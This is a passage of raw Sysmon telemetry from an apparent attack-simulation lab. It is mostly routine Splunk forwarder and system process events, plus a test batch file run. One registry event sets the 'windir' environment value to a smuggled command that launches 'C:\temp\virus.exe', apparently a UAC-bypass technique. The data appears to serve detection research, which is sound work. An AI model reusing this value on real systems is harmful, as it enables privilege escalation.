Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.047{466BC892-F5C4-60EB-617D-00000000CF01}52842492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245F906A9FFDFE0419A6DD42628284B4,SHA256=2E196ED680C78E759AC89717B004C49DC0AB4594FA7BF60A97DD64D4EBE127CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:51.358{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57324-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:54.528{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=469B2D91BF8C3E11B65A0441B799208A,SHA256=4E9A6F8E6E362055030F2BEEFEEEB34C5FE3B1E0A9176F94F6DDD167657BA5AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.754{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51090-false10.0.1.12-8000- 354300x80000000000000001050548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.500{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse20.101.57.9-123ntp 10341000x80000000000000001050547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.180{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.084{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=920B9BB2E5716C7181B6AB2793F8FEB4,SHA256=C744057D6A9D17508133EF6C9D68CDC55249B92D93FCCFD0FA4A05358E58A4BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:55.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA7E4FC9E38A736238FF24EFA5BEB269,SHA256=C79088660911C4FBA1758D4E498356BFA634582465596CDF114B030EEE7C560E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:55.500{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001050551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:55.185{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77DA38727514CFC59C2F171BF0839645,SHA256=8E58A145FA4B9708E959FF47CB3B5A0A5522D76083D61283ECD3275CFA185AEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:55.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCF8A229757AAB904C574B78B15FB186,SHA256=F033FD899C4466E955C250DAECB104E2EE2F80A75A8074F7A211AFE436697286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:56.606{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18D7588547FEDF5764B157E42B1AE34,SHA256=807831482D19F19C196CDCA76AD68BE22209EB9995C4A82719B939B39A0799A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14371A1AA410693C265BA0C9EAB19985,SHA256=1061ACDCC74C3068A62EE86D00CE9F39E6AD233F3565F144034F78A4412AC281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED47B92872BB82EF587E939A4CC76D31,SHA256=25390ED2743430B5D6F85E6AF6DC9FB7237956409E4070C608FCE0C27D676B13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.268{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 2 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 13241300x80000000000000001050597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:56:56.263{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windircmd /c start C:\temp\virus.exe&REM 10341000x80000000000000001050596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 